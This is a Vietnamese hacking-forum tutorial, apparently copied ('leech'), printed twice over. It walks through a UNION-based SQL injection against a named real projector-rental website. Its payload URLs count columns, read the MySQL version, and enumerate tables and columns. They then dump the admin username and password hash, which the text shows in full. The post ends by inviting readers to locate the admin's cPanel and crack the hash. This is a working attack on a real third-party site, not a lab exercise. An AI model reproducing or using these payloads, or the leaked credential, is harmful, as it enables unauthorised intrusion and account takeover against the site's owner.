- victim: We are sory for any inconvenience - Chúng tôi xin lỗi vì sự bất tiện này!!!!
__đầu tiên xác định lỗi: thêm ( ' ) vào trước ( .html ) và dấu ( - ) vào trước chữ ( may )
=> ta được: http://www.maychieuchothue.com/ho-tr...diem'.html
=> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-may-chieu-cong-nghe-lcd-va-dlp-uu-nhuoc-diem''' at line 3
__ xác định số column: http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' order by 3-- -.html
* chú ý: không có cái này không được nhé ( -- - )
=> Unknown column '3' in 'order clause'
http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' order by 2-- -.html
=>> không lỗi, vậy nó có 2 column
chỉ có 2 column thôi nên bỏ qua bước xem nó lỗi ở table nào nhé ! ở đây nó lỗi ở số 2
___xác định verseion: http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' union select 1,@@version-- -.html
=> ta đc: 5.5.8
__tiếp theo mình sẽ get table:
http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()-- -.html
=> ta được: chungtoi,gioithieu,hotro,loaisb,loaisp,sanpham,sid ebar,user,yahoo
tới đây mình tập trung vào table: user
__ get column từ table user:
http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x75736572-- -.html
***: 75736572 đây chữ user sau khi chuyển sang dạng hex, bắt buộc phải làm cái này !
=> ta được 1 đóng như thê này:
id,name,username,password,thuTu,id,name,username,p assword,thuTu,username,password,username,password, userid,usergroupid,membergroupids,displaygroupid,u sername,password,passworddate,email,styleid,parent email,homepage,icq,aim,yahoo,msn,skype,showvbcode, showbirthday,usertitle,customtitle,joindate,dayspr une,lastvisit,lastactivity,lastpost,lastpostid,pos ts,reputation,reputationlevelid,timezoneoffset,pmp opup,avatarid,avatarrevision,profilepicrevision,si gpicrevision,options,birthday,birthday_search,maxp osts,startofweek,ipaddress,referrerid,languageid,e mailstamp,threadedmode,autosubscribe,pmtotal,pmunr ead,salt,ipoints,infractions,warnings,infractiongr oupids,infractiongroupid,adminoptions,profilevisit s,friendcount,friendreqcount,vmunreadcount,vmmoder atedcount,socgroupinvitecount,socgroupreqcount,pcu nreadcount,pcmoderatedcount,gmmoderatedcount,asset posthash,fbuserid,fbjoindate,fbname,logintype,fbac cesstoken,newrepcount,post_thanks_user_amount,post _thanks_thanked_posts,post_thanks_thanked_times,to pxtab,topxmenu,topxresul
- các bạn đừng có hoa mắt, chúng ta chỉ tập trung vào: username và password thôi, mấy cái kìa get cũng chỉ đc cái thông báo "not found" chứ chẳng có gì đâu
___ get data:
http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' union select 1,group_concat(username,0x7c,password) from user-- -.html
=> ta được: admin|d9e0c8391e50ab616cd531b5bcb95c7e
việc còn lại là tìm cpanel của admin và crack password, ở đây password này mình không crack được, ai crack được thì crack nhé
tới đây hết nhé, có gì không đúng các bác đóng góp ý kiến nhé, mình cũng newbie thôi
_______End TuT_______
Nguồn : leech
__đầu tiên xác định lỗi: thêm ( ' ) vào trước ( .html ) và dấu ( - ) vào trước chữ ( may )
=> ta được: http://www.maychieuchothue.com/ho-tr...diem'.html
=> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-may-chieu-cong-nghe-lcd-va-dlp-uu-nhuoc-diem''' at line 3
__ xác định số column: http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' order by 3-- -.html
* chú ý: không có cái này không được nhé ( -- - )
=> Unknown column '3' in 'order clause'
http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' order by 2-- -.html
=>> không lỗi, vậy nó có 2 column
chỉ có 2 column thôi nên bỏ qua bước xem nó lỗi ở table nào nhé ! ở đây nó lỗi ở số 2
___xác định verseion: http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' union select 1,@@version-- -.html
=> ta đc: 5.5.8
__tiếp theo mình sẽ get table:
http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()-- -.html
=> ta được: chungtoi,gioithieu,hotro,loaisb,loaisp,sanpham,sid ebar,user,yahoo
tới đây mình tập trung vào table: user
__ get column từ table user:
http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x75736572-- -.html
***: 75736572 đây chữ user sau khi chuyển sang dạng hex, bắt buộc phải làm cái này !
=> ta được 1 đóng như thê này:
id,name,username,password,thuTu,id,name,username,p assword,thuTu,username,password,username,password, userid,usergroupid,membergroupids,displaygroupid,u sername,password,passworddate,email,styleid,parent email,homepage,icq,aim,yahoo,msn,skype,showvbcode, showbirthday,usertitle,customtitle,joindate,dayspr une,lastvisit,lastactivity,lastpost,lastpostid,pos ts,reputation,reputationlevelid,timezoneoffset,pmp opup,avatarid,avatarrevision,profilepicrevision,si gpicrevision,options,birthday,birthday_search,maxp osts,startofweek,ipaddress,referrerid,languageid,e mailstamp,threadedmode,autosubscribe,pmtotal,pmunr ead,salt,ipoints,infractions,warnings,infractiongr oupids,infractiongroupid,adminoptions,profilevisit s,friendcount,friendreqcount,vmunreadcount,vmmoder atedcount,socgroupinvitecount,socgroupreqcount,pcu nreadcount,pcmoderatedcount,gmmoderatedcount,asset posthash,fbuserid,fbjoindate,fbname,logintype,fbac cesstoken,newrepcount,post_thanks_user_amount,post _thanks_thanked_posts,post_thanks_thanked_times,to pxtab,topxmenu,topxresul
- các bạn đừng có hoa mắt, chúng ta chỉ tập trung vào: username và password thôi, mấy cái kìa get cũng chỉ đc cái thông báo "not found" chứ chẳng có gì đâu
___ get data:
http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' union select 1,group_concat(username,0x7c,password) from user-- -.html
=> ta được: admin|d9e0c8391e50ab616cd531b5bcb95c7e
việc còn lại là tìm cpanel của admin và crack password, ở đây password này mình không crack được, ai crack được thì crack nhé
tới đây hết nhé, có gì không đúng các bác đóng góp ý kiến nhé, mình cũng newbie thôi
_______End TuT_______
Nguồn : leech